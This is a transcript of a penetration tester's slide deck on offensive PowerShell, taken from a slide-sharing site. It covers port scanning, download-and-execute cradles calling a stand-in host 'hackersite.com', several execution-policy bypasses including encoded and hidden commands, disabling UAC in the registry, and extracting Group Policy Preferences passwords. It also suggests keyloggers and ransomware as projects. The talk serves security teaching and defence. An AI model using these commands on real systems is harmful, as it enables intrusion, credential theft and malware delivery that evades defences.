Power on, Powershell

3,546 views

Published on

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,546
On SlideShare
0
From Embeds
0
Number of Embeds
1,267
Actions
Shares
0
Downloads
78
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Power on, Powershell

  1. 1. Power on, PowerShell Using PowerShell to do the nasty Nikhil Sreekumar roo7break@gmail.com @roo7break www.roo7break.co.uk
  2. 2. The plug• Nikhil Sreekumar – Senior Penetration Tester @ 7Safe – Over three years as penetration tester • CREST ACE certified – Also deliver’s 7Safe’s courses • CSTP – Certified Security Testing Professional • CAST – Certified Application Security Tester (advanced) – Previous roles • Breach Forensic Investigator • IT Consultant – Loves Python; Mixed feelings for Ruby; Hates Perl
  3. 3. Intro• Normal penetration testing revolves a lot around network based attacks using – Attack frameworks (toolkits) • Social engineering toolkit • Metasploit • Core Impact – Exploit sources • Exploit-db.com • 1337day.com• Exploit -> Get a shell -> Exploit more -> Get domain admin -> Report -> Go out for a beer
  4. 4. But, what if• You have access to a system, but – No outbound connection* – You are in a restricted environment (e.g. Citrix) – Current user privileges are very restricted – Payloads/tools detected by Anti- Virus/HIDS * Open traffic is blocked
  5. 5. Time for a rethink• Cannot rely on any open source exploitation framework – AV vendors are WATCHING! – System/Network admins are getting smarter and cleverer – Organisations are investing in security• Maybe its time to think of an alternate solution. – Why not look into bending existing technology to do our bidding?
  6. 6. Welcome to, PowerShell• Unix bash like shell in Windows – Way powerful than CMD• Available from Vista upwards – Can be disabled from Server 2008; however its not that easy in Windows 7• Allows to – Manage registry, services, processes, event logs and Windows Management Instrumentation (WMI) – Task based scripting language – Powerful object manipulation capabilities – Simplified and consistent design• Full integration with – Existing Microsoft products like Exchange, AD, etc. – Can be directly called from .NET framework [Microsoft Technet] - http://technet.microsoft.com/en-gb/library/bb978526.aspx
  7. 7. Show me the money
  8. 8. Scripting PowerShell• Use of CmdLets – Lightweight command; used in PowerShell environment. – Typically a .NET framework class – Invoked within the context of automation scripts provided at the command line. – Also invoked programmatically through Windows PowerShell APIs.
  9. 9. Scripting PowerShell• Basic CmdLets CmdLets PowerShell Alias CMD.exe *nix environment Get-Help man, help help man Get-Content cat, gc, type type cat Move-Item move, mv, mi move mv Copy-Item cp, copy, cpi copy cp Select-String NONE find, findstr grep Source: http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
  10. 10. Scripting PowerShell• Basic CmdLets (contd.) – Where-Object (alias ?) • Filter objects passed down via pipe (|)  Get-Service | ? {$_.Status –eq “Running”}  Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(iphlpapi.dll)*" -and $_.Modules -like "*(WININET.dll)*" } – ForEach-Object (alias %) • Not to be confused with loop statement, ForEach • Action to be performed on each object passed down via pipe (|)  Get-ChildItem | ForEach-Object {echo $_.Name}  Same as dir :D – Get-Member (alias gm) • Provides you the list of all objects you can access to filter your query using ? And %  Get-ChildItem | gm• For more info, refer: – http://www.powershellpro.com/powershell-tutorial-introduction/tutorial-powershell-cmdlet/ – http://technet.microsoft.com/en-us/scriptcenter/dd772285.aspx
  11. 11. How to script using PowerShell• Using the PowerShell shell – RUN powershell.exe to start• Echo commands into a file; Save as .ps1 – .ps1 files are automatically recognised as PowerShell scripts – Can be manipulated using the built-in PowerShell Integrated Scripting Environment (ISE) – IDE for PowerShell
  12. 12. Sample uses for PT• Port Scanning1..1024 | ForEach-Object {echo((new-object Net.Sockets.TcpClient).Connect(“<TargetIP>",$_)) “Port $_ isopen"} 2>$nullPort 80 is open• You could modify the script above to send a string to remote host) for Egress checking
  13. 13. Sample uses for PT• Port Sweep – Scan the range for all IPs with port 8080 open1..255 | ForEach-Object {echo((New-Object Net.Sockets.TcpClient).Connect("10.1.1.$_",8080)) "10.1.1.$_:8080is open" }2>$null10.1.1.100:8080 is open
  14. 14. Sample uses for PT• Downloading stuff – Binaries(New-ObjectSystem.Net.WebClient).DownloadFile("http://hackersite.com/pwnc.exe","c:pwnc.exe“) – Text file stdout to local file(New-ObjectSystem.Net.WebClient).DownloadString("http://hackersite.com/malicious.ps1") | Out-File –Encoding ASCII securescript.ps1
  15. 15. Hold on tiger• Did you really think its going to be that easy?? – PowerShell isn’t going to let you run any script without having a say.• It tries to enforce “security” using something called Execution Policy. – Get-Execution Policy • Will give you current policy status
  16. 16. The Security• Execution Policies: – Restricted • Default policy • Only individual commands; no scripts – AllSigned • Allows scripts execution • Needs to be signed by trusted publisher • Prompts if ran using untrusted publishers – RemoteSigned • Allows scripts execution • Scripts downloaded from Internet should be signed by trusted publisher • Signing not required for local scripts
  17. 17. The Security (contd.) – Unrestricted • Allows unsigned script execution • Prompts warning before execution – Bypass • Nothing is blocked; no warnings or prompts • To be used when PowerShell is used within a larger app – Undefined • No specific policy is set to current scope – If nothing is specified, default policy is applied = Restricted.• For more information, RTFM
  18. 18. However
  19. 19. Before we move on• UAC (User Account Control) – Is a pain in the a**• Most of the attacks described may/may not interfere with UAC.• At this point in time, we cannot bypass UAC. Or can we? – Will take this up at a later stage.To check UAC level $(Get-ItemProperty -Path registry::HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionp oliciessystem -Name EnableLUA).EnableLUA  If value is “1”, then UAC is ON.• To disable UAC Set-ItemProperty -Path HKLM:SoftwareMicrosoftWindowsCurrentVersionpoliciessystem -Name EnableLUA –Value  However, we need local admin rights  And, a system reboot for this to change to take effect
  20. 20. Think like a hacker• These policies can be bypassed• Technique #1Change the default policy to RemoteSignedSet-ExecutionPolicy RemoteSigned–Scope CurrentUser – However we need admin privileges to do this – You don’t want to ‘accidently’ set the policy for all users
  21. 21. Think like a hacker• Technique #2Pass the commandpowershell –command dir• Executes the specified commands (and any parameters) as though they were typed at the PowerShell command prompt [Powershell Help]
  22. 22. Think like a hacker• Technique #2 (contd.)Pass the command powershell –command “New-Object System.Net.WebClient).DownloadFil e("http://hackersite.com/pwnc.exe ","c:pwnc.exe“)” powershell –command “Invoke- Expression (gc .script.ps1)”• Need a one liner? gc .script.ps1 | iex
  23. 23. Think like a hacker• Technique #3CreateCMD• Run a script without actually running a script – execute the script contents in the current shell context with all new functions that are in the script• Uses “-EncodedCommand” – Accepts Base64 version of the command• Checkout Dave Kennedy (ReL1K) and Josh Kelly (winfang) Defcon 18 talk – PowerShell.. OMFG• Impact – Policy does not matter – No need to disable execution policies – No registry interaction, no reboots, etc.
  24. 24. Think like a hacker• Technique #3 (contd.) – Write your script (.ps1) in one long line. – All {}s should be on the same line and use ; to terminate each command. $command = Get-Content .script.ps1 $encodedcmd = [convert]::ToBase64String([Text.Encod ing]::Unicode.GetBytes($command)) Powershell.exe –EncodedCommand $encodedcmd
  25. 25. Think like a hacker• Technique #4• This technique will – try and bypass the execution policy – execute the script in the background• Can be used once you have a way into a system – E.g. shell powershell.exe -ExecutionPolicy Bypass - NoLogo -NonInteractive -NoProfile - WindowStyle Hidden -File <script_name> Source: http://obscuresecurity.blogspot.co.uk/2011/08/powershell-executionpolicy.html
  26. 26. Post Exploitation the PowerShell wayExploiting Windows 2008 Group Policy Preferences• Group Policy preferences, new for the Windows Server 2008 operating system, include more than 20 new Group Policy extensions that expand the range of configurable settings within a Group Policy object (GPO) [http://technet.microsoft.com/en- us/library/cc731892%28WS.10%29.aspx]• Helps setting local admin password for workstations and servers – Adding new users on local machines, etc. – Via Local User and Groups Extension
  27. 27. Post Exploitation the PowerShell wayExploiting Windows 2008 Group Policy Preferences(contd.)• Unknown to the general public (and many system admins) Windows was storing the encrypted admin passwords in an XML files accessible to normal users• Location: – serversysvoldomainPolicies{Hash}MACHINEPreferencesGrou psGroup.xml
  28. 28. Post Exploitation the PowerShell wayExploiting Windows 2008 Group Policy Preferences(contd.)
  29. 29. Post Exploitation the PowerShell wayExploiting Windows 2008 Group Policy Preferences(contd.)• Encryption – AES = Strong• It would take years to decrypt that password. Only if someone could help me..• Why not ask Microsoft?
  30. 30. Post Exploitation the PowerShell wayhttp://msdn.microsoft.com/en-us/library/cc422924.aspx
  31. 31. Post Exploitation the PowerShell way• Lets use PowerShell to extract these passwords – Connect to domain controller as normal user $output = get-childitem serversysvoldomainPolicies - filter *.xml -recurse | Get- Content;[regex]::match($output,cpassw ord="(?<pwd>.+?)") | foreach {$_.groups["pwd"].value}
  32. 32. Post Exploitation the PowerShell way• Are there any more locations?• Oh yeah! – ServicesServices.xml – ScheduledTasksScheduledTasks.xml – PrintersPrinters.xml – DrivesDrives.xml – DataSourcesDataSources.xml• Source: http://rewtdance.blogspot.co.uk/2012/06/exploi ting-windows-2008-group-policy.html
  33. 33. Would you like some exploitation with that, Sir?• Default tools/exploits/payloads are detectable – Customize them – Design your own exploits – Innovative encoding/encryption techniques – Use PowerShell to execute it for you• Examples – Hyperion runtime encrypter by Nullsecurity.net • Produces an AES encrypted executable that brute forces its own key in-memory • Can bypass most anti-virus solutions • http://nullsecurity.net/papers.html – Alphanum + ASCII encode + Base64 your executable (use metasploit to do this – msfvenom) • Then use PowerShell to decode it in-memory and execute it – Check out www.exploit-monday.com by Matthew Graeber for sample codes – Also check out the PowerShell code used in SET - http://svn.secmaniac.com/social_engineering_toolkit/src/powershell/ • Can bypass most anti-virus solutions • http://www.offensive-security.com/metasploit-unleashed/Msfvenom
  34. 34. More??• Homework • Try out PowerShell based attacks using Social Engineering Toolkit (SET) • Recode Metasploit modules to be used within PowerShell scripts • Come up with innovative attacks using PowerShell. – Webcam, microphone, keyloggers, etc.• Naughty, naughty. • How about designing your own ransomware – Note: Use only on your system. DO NOT SEND TO ANYONE ELSE. I will not accept any responsibility for your actions. Your actions, your responsibility. I have warned you. – http://nakedsecurity.sophos.com/2013/03/05/russian-ransomware- windows-powershell/
  35. 35. Powered by PowerShell• Existing PowerShell based attack tools – Metasploit PowerShell modules – PowerSploit – Nishang – PowerSyringe• Recommended Reads and References – PowerShell for Pentesters • http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers – PowerShell OMFG • https://www.trustedsec.com/august-2010/powershell_omfg/ – PowerShell Code Repository • http://poshcode.org/ – Windows PowerShell Cookbook • By Lee Holmes – Server 2008 Group Policy Preferences (GPP) – And how they get your domain 0wned • By Chris Gates (carnal0wnage) • http://www.slideshare.net/chrisgates/exploiting-group-policy-preferences
  36. 36. And to conclude• Sys admins/Network admins/Managers – Check out every new feature introduced by a vendor – Is it necessary for your org? No? Remove/Disable it. – Ensure AV is installed and updated on production environment. – Attend more security conferences to find out what new tech the hackers could use to attack your organisation.• Hacker/Pentesters – Check out every new feature introduced by a vendor – Look at how you can twist various features to do your bidding – Don’t rely on your attacks tools – Remember AV vendors are watching and catching up – Push yourself – come up with innovative tech – Communicate all new tech u find. Our community is very open. You could end up finding an even better way to attack.
  37. 37. • Twitter: @roo7break• Web: www.roo7break.co.uk• Email: roo7break@gmail.com

×